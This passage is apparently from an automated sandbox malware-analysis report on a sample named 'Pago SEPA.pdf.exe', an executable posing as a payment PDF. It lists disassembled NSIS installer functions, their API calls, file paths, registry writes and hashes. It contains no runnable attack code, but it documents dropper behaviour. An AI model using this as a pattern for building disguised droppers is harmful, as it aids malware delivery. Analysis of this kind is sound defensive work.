                                                                      • Opcode Fuzzy Hash: cf664cf4806fb32f7aca161fbd37ecbefe006222c1d77f285591627fdb242337
                                                                      • Instruction Fuzzy Hash: CC517A71900219ABDB10DF65D904B9F3FA8AF04766F14427BF911BB2C5C7789E408BE9
                                                                      Function 0040564D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 698 40564d-405698 CreateDirectoryW 699 40569a-40569c 698->699 700 40569e-4056ab GetLastError 698->700 701 4056c5-4056c7 699->701 700->701 702 4056ad-4056c1 SetFileSecurityW 700->702 702->699 703 4056c3 GetLastError 702->703 703->701
                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(?,00409300,C:\Users\user\AppData\Local\Temp\), ref: 00405690
                                                                      • GetLastError.KERNEL32 ref: 004056A4
                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B9
                                                                      • GetLastError.KERNEL32 ref: 004056C3
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405673
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 3449924974-823278215
                                                                      • Opcode ID: 1b2f11e61ef5d0ea47512485c2032ecfb56833f92387a3fb2d2f530f64b4175b
                                                                      • Instruction ID: d2f3f002a39499475f228c0a6bab6309b881bedc09a5d6a8f103fb05119b383a
                                                                      • Opcode Fuzzy Hash: 1b2f11e61ef5d0ea47512485c2032ecfb56833f92387a3fb2d2f530f64b4175b
                                                                      • Instruction Fuzzy Hash: DE010871D14219EAEF119FA0CD047EFBFB8EB14314F10853AD909B6190E779A604CFAA
                                                                      Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 704 401bdf-401bf7 call 402ba2 * 2 709 401c03-401c07 704->709 710 401bf9-401c00 call 402bbf 704->710 712 401c13-401c19 709->712 713 401c09-401c10 call 402bbf 709->713 710->709 716 401c1b-401c2f call 402ba2 * 2 712->716 717 401c5f-401c89 call 402bbf * 2 FindWindowExW 712->717 713->712 727 401c31-401c4d SendMessageTimeoutW 716->727 728 401c4f-401c5d SendMessageW 716->728 729 401c8f 717->729 730 401c92-401c95 727->730 728->729 729->730 731 401c9b 730->731 732 402a4c-402a5b 730->732 731->732
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: 89185f19cab5c9d2123c9567e553a40f312bc8837cbfc1fecf3123f783c5ad12
                                                                      • Instruction ID: a67f43666b390050b7c93cc16dc22df3288c4645dfbd1c9967af83c22614668d
                                                                      • Opcode Fuzzy Hash: 89185f19cab5c9d2123c9567e553a40f312bc8837cbfc1fecf3123f783c5ad12
                                                                      • Instruction Fuzzy Hash: 7C21B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A409B69
                                                                      Function 00405C23 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 735 405c23-405c2f 736 405c30-405c64 GetTickCount GetTempFileNameW 735->736 737 405c73-405c75 736->737 738 405c66-405c68 736->738 740 405c6d-405c70 737->740 738->736 739 405c6a 738->739 739->740
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00405C41
                                                                      • GetTempFileNameW.KERNELBASE(00409300,?,00000000,?,?,?,00000000,00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 00405C5C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-44229769
                                                                      • Opcode ID: f059ee56c8deccd03f6e154050eb187f2ccb3477461fa331799173a8e43ad9ef
                                                                      • Instruction ID: 4fdac09ee551a982241d11f866b864b283b1b610f450d112551ccb25b2c02e5c
                                                                      • Opcode Fuzzy Hash: f059ee56c8deccd03f6e154050eb187f2ccb3477461fa331799173a8e43ad9ef
                                                                      • Instruction Fuzzy Hash: 0EF03676B04208BFEB108F55DD49E9BB7ADEB95750F10403AF901F7150E6B0AE548758
                                                                      Function 00406389 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 741 406389-4063a9 GetSystemDirectoryW 742 4063ab 741->742 743 4063ad-4063af 741->743 742->743 744 4063c0-4063c2 743->744 745 4063b1-4063ba 743->745 746 4063c3-4063f2 wsprintfW LoadLibraryW 744->746 745->744 747 4063bc-4063be 745->747 747->746
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063A0
                                                                      • wsprintfW.USER32 ref: 004063DB
                                                                      • LoadLibraryW.KERNELBASE(?), ref: 004063EB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                      • String ID: %s%S.dll
                                                                      • API String ID: 2200240437-2744773210
                                                                      • Opcode ID: 8eb02a3bbd68b69db90ac38405ec0e3d1a99f1663c9491293569e02019d06da0
                                                                      • Instruction ID: 006adf5c24d44cc190f28e383f23d96ea846dcb1794efbef959ff2cbc64c9496
                                                                      • Opcode Fuzzy Hash: 8eb02a3bbd68b69db90ac38405ec0e3d1a99f1663c9491293569e02019d06da0
                                                                      • Instruction Fuzzy Hash: D6F09030910119EBDB14AB68DD4DEAB366CAB00304F104476A906F21E1E77CEA68CBE9
                                                                      Function 0040237B Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 748 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 755 4023c7-4023cf 748->755 756 402a4c-402a5b 748->756 757 4023d1-4023de call 402bbf lstrlenW 755->757 758 4023e2-4023e5 755->758 757->758 762 4023f5-4023f8 758->762 763 4023e7-4023f4 call 402ba2 758->763 766 402409-40241d RegSetValueExW 762->766 767 4023fa-402404 call 403027 762->767 763->762 770 402422-4024fc RegCloseKey 766->770 771 40241f 766->771 767->766 770->756 771->770
                                                                      APIs
                                                                      • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                      • lstrlenW.KERNEL32(0040A5C8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,0040A5C8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                      • RegCloseKey.ADVAPI32(?,?,?,0040A5C8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateValuelstrlen
                                                                      • String ID:
                                                                      • API String ID: 1356686001-0
                                                                      • Opcode ID: 9bf41047b32e6cd9b1820310136988528b85b9418686cf110aa5b41b216baf5a
                                                                      • Instruction ID: 7111b63e716528206d7143fef0c5d48aa4ff5df43585b472b347a68cc626e816
                                                                      • Opcode Fuzzy Hash: 9bf41047b32e6cd9b1820310136988528b85b9418686cf110aa5b41b216baf5a
                                                                      • Instruction Fuzzy Hash: 5B11AE71E00108BFEB10EFA4DD89DAE76BCEB04358F10403AF904B21D1D6B85E419628
                                                                      Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0040517E: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
                                                                        • Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
                                                                        • Part of subcall function 0040517E: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00403160,00403160,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000), ref: 004051D9
                                                                        • Part of subcall function 0040517E: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\), ref: 004051EB
                                                                        • Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
                                                                        • Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
                                                                        • Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239
                                                                        • Part of subcall function 004056FF: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425710,Error launching installer), ref: 00405728
                                                                        • Part of subcall function 004056FF: CloseHandle.KERNEL32(00409300), ref: 00405735
                                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 3585118688-0
                                                                      • Opcode ID: 076f9d79b1a5edd219a2cbc1743cad31530fe17f334da5f673e7aab774ebef08
                                                                      • Instruction ID: f6705c9319aae76dbd7499045e6368890872edf6032e54a723c1862b254634bc
                                                                      • Opcode Fuzzy Hash: 076f9d79b1a5edd219a2cbc1743cad31530fe17f334da5f673e7aab774ebef08
                                                                      • Instruction Fuzzy Hash: 7611A131900108EBCF21AFA1CD8499E7AB6EB04314F24407BF601B61E1C7798A819B9D
                                                                      Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00405A7E: CharNextW.USER32(?,?,00424F10,00409300,00405AF2,00424F10,00424F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405830,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 00405A8C
                                                                        • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405A91
                                                                        • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405AA9
                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                        • Part of subcall function 0040564D: CreateDirectoryW.KERNELBASE(?,00409300,C:\Users\user\AppData\Local\Temp\), ref: 00405690
                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers,?,00000000,000000F0), ref: 00401645
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers, xrefs: 00401638
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                      • String ID: C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers
                                                                      • API String ID: 1892508949-1972456662
                                                                      • Opcode ID: c935efba02d28314a2f0d4a525c586f630aa03927d483fbb1732e1e842517540
                                                                      • Instruction ID: 9984d83288963ddb5bfb53596c8c9f6ed7fbdeacdcadece23b283b8c4b9f7bd6
                                                                      • Opcode Fuzzy Hash: c935efba02d28314a2f0d4a525c586f630aa03927d483fbb1732e1e842517540
                                                                      • Instruction Fuzzy Hash: 70119331504505EBCF206FA48D4199F3AB1EF44368B24097BEA05B61F2D63A4A819E5E
                                                                      Function 00405ADB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C
                                                                        • Part of subcall function 00405A7E: CharNextW.USER32(?,?,00424F10,00409300,00405AF2,00424F10,00424F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405830,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 00405A8C
                                                                        • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405A91
                                                                        • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405AA9
                                                                      • lstrlenW.KERNEL32(00424F10,00000000,00424F10,00424F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405830,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 00405B34
                                                                      • GetFileAttributesW.KERNELBASE(00424F10,00424F10,00424F10,00424F10,00424F10,00424F10,00000000,00424F10,00424F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405830,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405B44
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405ADB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 3248276644-823278215
                                                                      • Opcode ID: 5cd88eb9c331bd035ef3732d22fdb38d6df270911e15b1e56a74679c362f2206
                                                                      • Instruction ID: a8deb24d6afa2735206f329f0351f59021ff10951cf48c606255c952c9ad3203
                                                                      • Opcode Fuzzy Hash: 5cd88eb9c331bd035ef3732d22fdb38d6df270911e15b1e56a74679c362f2206
                                                                      • Instruction Fuzzy Hash: CBF04921304E5215D622323A1C44AAF3554CFC1364705073BB861721E1CB3C9943DE7E
                                                                      Function 004056FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425710,Error launching installer), ref: 00405728
                                                                      • CloseHandle.KERNEL32(00409300), ref: 00405735
                                                                      Strings
                                                                      • Error launching installer, xrefs: 00405712
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
